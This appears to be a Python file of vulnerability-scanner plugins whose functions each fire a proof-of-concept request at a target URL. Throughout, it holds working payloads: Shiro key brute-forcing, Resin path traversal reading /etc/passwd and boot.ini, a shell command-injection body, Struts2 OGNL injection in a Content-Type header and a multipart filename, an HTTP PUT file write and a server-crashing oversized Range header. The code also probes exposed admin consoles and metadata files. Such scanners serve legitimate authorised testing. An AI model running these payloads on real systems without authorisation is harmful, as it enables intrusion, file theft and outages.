def verify(arg, **kwargs):
    """Detect Shiro on *arg* and try each candidate key in the module-level `keys`.

    A baseline request is sent with a junk `rememberMe` cookie; then, for each
    key, a `rememberMe` value is produced with CBCCipher() over the decoded
    `checkdata` and the header length of the reply is compared with the
    baseline. A different header length together with a non-400 status is
    taken as "this key decrypts the cookie".

    Returns the result dict for the first matching key, otherwise None.
    Raises nothing of its own; request errors propagate (there is no try/except).
    NOTE(review): verify=False disables TLS certificate checking for both requests.
    """
    a = test_shiro(arg)
    if a:
        print("[!]Target {} Found Shiro".format(arg))
        # Baseline: a cookie that can never decrypt, so the response shape for
        # "wrong key" is known before the loop starts.
        r1 = requests.get(arg, cookies={'rememberMe': "123"}, proxies=PROXY, timeout=10, verify=False, headers=headers, allow_redirects=False)
        res1 = len(str(r1.headers))
        for key in keys:
            print("[-] Brute key: {0}".format(key))
            payload = CBCCipher(key, base64.b64decode(checkdata))
            payload = payload.decode()
            r2 = requests.get(arg, cookies={'rememberMe': payload}, timeout=10, proxies=PROXY, verify=False, headers=headers, allow_redirects=False)
            res2 = len(str(r2.headers))
            # The check is differential: only a reply whose headers differ from
            # the wrong-key baseline (and is not a 400) counts as a hit.
            if res1 != res2 and r2.status_code != 400:
                print("[+] Found key!!!: {}".format(key))
                save(arg, pocname, key)
                return {"url": arg, "poc-name": pocname, "exploit": key}
            else:
                pass
    else:
        return None
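def verify(arg, **kwargs):
    """Check whether any authoritative name server of *arg* serves a zone transfer.

    The scheme and port are stripped from *arg* to get the domain, its NS
    records are resolved, and an AXFR is attempted against each server in turn.

    Returns the result dict naming the first server that served the zone, or
    None when no server did or any resolver/transfer step failed.
    """
    try:
        dnsResolver = dns.resolver.Resolver()
        dnsResolver.timeout = 10
        # Both replacements must chain from the same value: the original
        # assigned `host` from `arg` twice, so the "http://" prefix survived
        # and the split below yielded "http" instead of the domain.
        host = arg.replace("http://", "").replace("https://", "")
        domain = host.split(":")[0]
        ns = dnsResolver.query(domain, 'NS')
        for domain_dns in ns:
            xfr = dns.query.xfr(str(domain_dns), domain, timeout=10, lifetime=10)
            # from_xfr raises when the server refuses; a zone object means
            # the transfer completed.
            if dns.zone.from_xfr(xfr):
                save(domain, pocname, domain_dns)
                return {"url": domain, "poc-name": pocname, "exploit": domain_dns}
    except Exception:
        # Best-effort check: a failed lookup or refused transfer is "no finding".
        pass
    return None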
def verify(arg, **kwargs):
    """Probe the Jira group/user picker REST endpoint without credentials.

    A reply containing the users JSON object is the only fingerprint used and
    means the picker answered an unauthenticated request.

    Returns the result dict on a match, None on no match or request failure.
    """
    picker_path = "/rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false"
    try:
        reply = requests.get(url=arg + picker_path, timeout=5)
        matched = '{"users":{' in reply.text
        if matched:
            save(arg, pocname, picker_path)
            return {"url": arg, "poc-name": pocname, "exploit": picker_path}
    except Exception:
        pass
    return None
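def verify(arg, **kwargs):
    """Check for a Resin directory listing of WEB-INF via the `/ ../web-inf/` path.

    A body containing both "Directory of" and "resin" is treated as a hit.

    Returns the result dict on a match, None otherwise or on request failure.
    """
    exploit = "/ ../web-inf/"
    try:
        # timeout added: without it a silent host can block the scan forever;
        # 5 s matches the other GET checks in this file.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if "Directory of" in r.text and "resin" in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        pass
    return None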
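def verify(arg, **kwargs):
    """Check whether resin-doc's viewfile servlet returns a file outside the web root.

    The request asks for boot.ini under a Windows context path; a body with
    both "disk" and "boot" is treated as a hit.

    Returns the result dict on a match, None otherwise or on request failure.
    """
    exploit = "/resin-doc/viewfile/?contextpath=C:\&servletpath=&file=boot.ini"
    try:
        # timeout added so an unresponsive host cannot stall the scan.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if "disk" in r.text and "boot" in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        pass
    return None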
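def verify(arg, **kwargs):
    """Check whether resin-doc's viewfile servlet discloses JSP source.

    Requests index.jsp through the viewer; a body containing the JSP directive
    marker "<%@" together with "resin" is treated as a hit.

    Returns the result dict on a match, None otherwise or on request failure.
    """
    exploit = "/resin-doc/viewfile/?file=index.jsp"
    try:
        # timeout added so an unresponsive host cannot stall the scan.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if "<%@" in r.text and "resin" in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        pass
    return None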
def verify(arg, **kwargs):
    """Check whether a Subversion working-copy metadata file is web-accessible.

    Fetches `/.svn/all-wcprops` and treats the presence of the
    "svn:wc:ra_dav:version-url" property as proof that the .svn tree is served.

    Returns the result dict on a match, None on no match or request failure.
    """
    wcprops_path = "/.svn/all-wcprops"
    try:
        reply = requests.get(url=arg + wcprops_path, headers=headers, timeout=5)
        if "svn:wc:ra_dav:version-url" in reply.text:
            save(arg, pocname, wcprops_path)
            return {"url": arg, "poc-name": pocname, "exploit": wcprops_path}
    except Exception:
        pass
    return None
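def verify(arg, **kwargs):
    """Check whether the resin-doc jndi-appconfig example reads arbitrary files.

    The example's `inputFile` parameter is pointed at /etc/passwd; a body
    containing "root:" and "/bin/bash" is treated as a hit.

    Returns the result dict on a match, None otherwise or on request failure.
    """
    exploit = "/resin-doc/examples/jndi-appconfig/test?inputFile=/etc/passwd"
    try:
        # timeout added so an unresponsive host cannot stall the scan.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if "root:" in r.text and "/bin/bash" in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        pass
    return None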
def verify(arg, **kwargs):
    """Check whether Jira's QueryComponent action answers without authentication.

    A body beginning with the searchers JSON structure is the fingerprint.

    Returns the result dict on a match, None on no match or request failure.
    """
    action_path = "/secure/QueryComponent!Default.jspa"
    searchers_marker = '''{"searchers":{"groups":[{"searchers":[{"name"'''
    try:
        reply = requests.get(url=arg + action_path, timeout=5, headers=headers)
        if searchers_marker in reply.text:
            save(arg, pocname, action_path)
            return {"url": arg, "poc-name": pocname, "exploit": action_path}
    except Exception:
        pass
    return None
def verify(arg, **kwargs):
    """Check whether Jira's ViewUserHover page renders a profile link anonymously.

    The page is requested for a fixed, presumably non-existent username; the
    fingerprint is the exact avatar anchor tag for that name.

    Returns the result dict on a match, None on no match or request failure.
    """
    hover_path = "/secure/ViewUserHover.jspa?username=vvoxyxzt"
    avatar_anchor = '''<a id="avatar-image-link" title="vvoxyxzt" href="/secure/ViewProfile.jspa?name=vvoxyxzt">'''
    try:
        reply = requests.get(url=arg + hover_path, timeout=5, headers=headers)
        if avatar_anchor in reply.text:
            save(arg, pocname, hover_path)
            return {"url": arg, "poc-name": pocname, "exploit": hover_path}
    except Exception:
        pass
    return None
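def verify(arg, **kwargs):
    """Check whether the Druid monitoring console is reachable at /druid/index.html.

    The page title "Druid Stat Index" is the fingerprint.

    Returns the result dict on a match, None otherwise or on request failure.
    """
    exploit = "/druid/index.html"
    try:
        # timeout added so an unresponsive host cannot stall the scan.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if "Druid Stat Index" in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        pass
    return None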
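def verify(arg, **kwargs):
    """Check whether the JBoss JMX console is reachable without authentication.

    All three markers -- "JMImplementation", "JMX Agent View" and "jboss." --
    must appear in the body for a hit.

    Returns the result dict on a match, None otherwise or on request failure.
    """
    exploit = "/jmx-console/"
    try:
        # timeout added so an unresponsive host cannot stall the scan.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if 'JMImplementation' in r.text and 'JMX Agent View' in r.text and 'jboss.' in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        pass
    return None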
def verify(arg, **kwargs):
    """Check whether a Spring Boot `/env` endpoint is exposed.

    The body is matched for "spring.datasource", i.e. datasource configuration
    being returned to an unauthenticated caller.

    Returns the result dict on a match, None on no match or request failure.
    """
    env_path = "/env"
    try:
        reply = requests.get(url=arg + env_path, headers=headers, timeout=7)
        exposed = "spring.datasource" in reply.text
        if exposed:
            save(arg, pocname, env_path)
            return {"url": arg, "poc-name": pocname, "exploit": env_path}
    except Exception:
        pass
    return None
def verify(arg, **kwargs):
    """Check the webadm moni_detail action for command injection via `type`.

    A POST body whose `type` value breaks out into a shell read of
    /etc/passwd is sent; a reply containing "root:x" is treated as a hit.

    Returns the result dict on a match, None on no match or request failure.
    """
    action_path = "/webadm/?q=moni_detail.do&action=gragh"
    post_body = "type='|cat /etc/passwd||'"
    try:
        reply = requests.post(url=arg + action_path, headers=headers, data=post_body, timeout=7)
        if "root:x" in reply.text:
            save(arg, pocname, action_path)
            return {"url": arg, "poc-name": pocname, "exploit": action_path}
    except Exception:
        pass
    return None
def verify(arg, **kwargs):
    """Check for the Struts2 Content-Type OGNL evaluation (S2-045 style) via X-RES.

    A hit is a reply whose `x-res` header contains "1734102335", the product
    of the two constants in the OGNL expression. The `exploit` string built
    here is only what gets recorded via save(); this function sends the
    module-level `headers` unchanged and does not set Content-Type itself.

    Returns the result dict on a match, None on no match, missing header, or
    request failure.
    """
    ognl_record = "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-RES',40765*42539)}.multipart/form-data"
    try:
        reply = requests.get(url=arg, headers=headers, allow_redirects=False)
        # A KeyError on a missing x-res header is swallowed by the except below.
        if "1734102335" in reply.headers['x-res']:
            save(arg, pocname, ognl_record)
            return {"url": arg, "poc-name": pocname, "exploit": ognl_record}
    except Exception:
        pass
    return None
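def verify(arg, **kwargs):
    """Check whether a JetBrains `.idea/` project directory is served with a listing.

    A body containing "Directory: /.idea/" is treated as a hit.

    Returns the result dict on a match, None otherwise or on request failure.
    """
    # The original also defined paths for workspace.xml and modules.xml but
    # never requested them; only the directory itself is checked.
    exploit3 = "/.idea/"
    try:
        r1 = requests.get(url=arg + exploit3, headers=headers, timeout=5)
        if "Directory: /.idea/" in r1.text:
            save(arg, pocname, exploit3)
            return {"url": arg, "poc-name": pocname, "exploit": exploit3}
    except Exception:
        pass
    return None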
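def verify(arg, **kwargs):
    """Check whether the host behind *arg* exposes LDAP (port 389) via check_ldap().

    The scheme and port are stripped from *arg* to get the host name or IP,
    which is handed to check_ldap().

    Returns the result dict (url is the stripped host, exploit is "389") when
    check_ldap() reports a hit, otherwise None.
    """
    # Both replacements must chain from the same value: the original
    # reassigned from `arg` twice, so "http://" was never stripped and the
    # split below produced "http" for plain-http targets.
    host = arg.replace("http://", "").replace("https://", "")
    ip = host.split(":")[0]
    a = check_ldap(ip)
    try:
        if a:
            save(arg, pocname, "389")
            return {"url": host, "poc-name": pocname, "exploit": "389"}
    except Exception:
        pass
    return None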
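def bak(domain, file):
    """Fetch domain+file and record it as an exposed backup if served as a binary.

    A 200 reply whose Content-Type header contains "application" is treated
    as a hit: the full URL is saved via save() and the result dict is printed.
    Nothing is returned; request failures are ignored.
    """
    try:
        # timeout added so an unresponsive host cannot stall the caller's loop.
        r = requests.get(url=domain + file, headers=headers, timeout=5)
        if r.status_code == 200 and "Content-Type" in r.headers and "application" in r.headers["Content-Type"]:
            target = domain + file
            save(domain, pocname, target)
            print({"url": domain, "poc-name": pocname, "exploit": target})
    except Exception:
        pass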
def verify(arg, **kwargs):
    """Check whether the server accepts HTTP PUT by writing and reading back a test file.

    A small text body is PUT to /2222.txt; if a subsequent GET returns that
    body, the finding is saved and the file is removed with DELETE.

    Returns the result dict on a match, None on no match or request failure.
    """
    probe_path = "/2222.txt"
    probe_body = "This is a test!"
    try:
        requests.put(url=arg + probe_path, headers=headers, data=probe_body, timeout=7)
        readback = requests.get(url=arg + probe_path, headers=headers, timeout=5)
        if probe_body in readback.text:
            save(arg, pocname, probe_path)
            # Clean up the probe file; its outcome is not checked.
            requests.delete(url=arg + probe_path)
            return {"url": arg, "poc-name": pocname, "exploit": probe_path}
    except Exception:
        pass
    return None
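def verify(arg, **kwargs):
    """Check whether the host behind *arg* exposes MongoDB on 27017 via check_mongodb().

    The scheme and port are stripped from *arg* to get the host name, which
    is handed to check_mongodb() together with the fixed port.

    Returns the result dict (url is the stripped host, exploit is the port as
    a string) when check_mongodb() reports a hit, otherwise None.
    """
    port = 27017
    # Both replacements must chain from the same value: the original
    # reassigned from `arg` twice, so "http://" was never stripped and the
    # split below produced "http" for plain-http targets.
    host = arg.replace("http://", "").replace("https://", "")
    host = host.split(":")[0]
    a = check_mongodb(host, port)
    try:
        if a:
            save(arg, pocname, str(port))
            return {"url": host, "poc-name": pocname, "exploit": str(port)}
    except Exception:
        pass
    return None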
def verify(arg, **kwargs):
    """Check how the server handles an oversized negative Range header.

    The Content-Length of a plain GET is used to build two byte ranges, the
    second computed from 0x8000000000000000; a 206 Partial Content reply to
    that request is treated as a hit. The local `range_headers` deliberately
    does not use the module-level `headers`.

    Returns the result dict on a 206, None otherwise or on request failure.
    """
    try:
        probe = requests.get(url=arg)
        first = int(probe.headers['Content-Length']) + 300
        second = 0x8000000000000000 - first
        range_headers = {"Range": "bytes=-{},-{}".format(first, second)}
        ranged = requests.get(url=arg, headers=range_headers, stream=True, timeout=10)
        # Pull a small prefix so the streamed body is actually started.
        ranged.raw.read(500)
        if ranged.status_code == 206:
            save(arg, pocname, pocname)
            return {"url": arg, "poc-name": pocname, "exploit": pocname}
    except Exception:
        pass
    return None
def verify(arg, **kwargs):
    """Check for Struts2 OGNL evaluation in a multipart upload filename (S2-045 family).

    A single-part multipart body is posted whose filename carries the OGNL
    expression; a reply whose `x-res` header contains "1734102335" (the
    product of the two constants in the expression) is a hit. The local
    `headers` shadows the module-level one for this request only.

    Returns the result dict on a match, None on no match, missing header, or
    request failure.
    """
    finding_label = "upload type,the same as st2-045"
    boundary = "---------------------------735323031399963166993862150"
    ognl_filename = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-RES',40765*42539)}\x00b"
    headers = {
        'Content-Type': 'multipart/form-data; boundary=' + boundary + ''
    }
    body_parts = [
        "--" + boundary + "\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"" + ognl_filename + "\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--" + boundary + "--",
    ]
    multipart_body = "".join(body_parts)
    try:
        reply = requests.post(url=arg, headers=headers, data=multipart_body)
        # A KeyError on a missing x-res header is swallowed by the except below.
        if "1734102335" in reply.headers['x-res']:
            save(arg, pocname, finding_label)
            return {"url": arg, "poc-name": pocname, "exploit": finding_label}
    except Exception:
        pass
    return None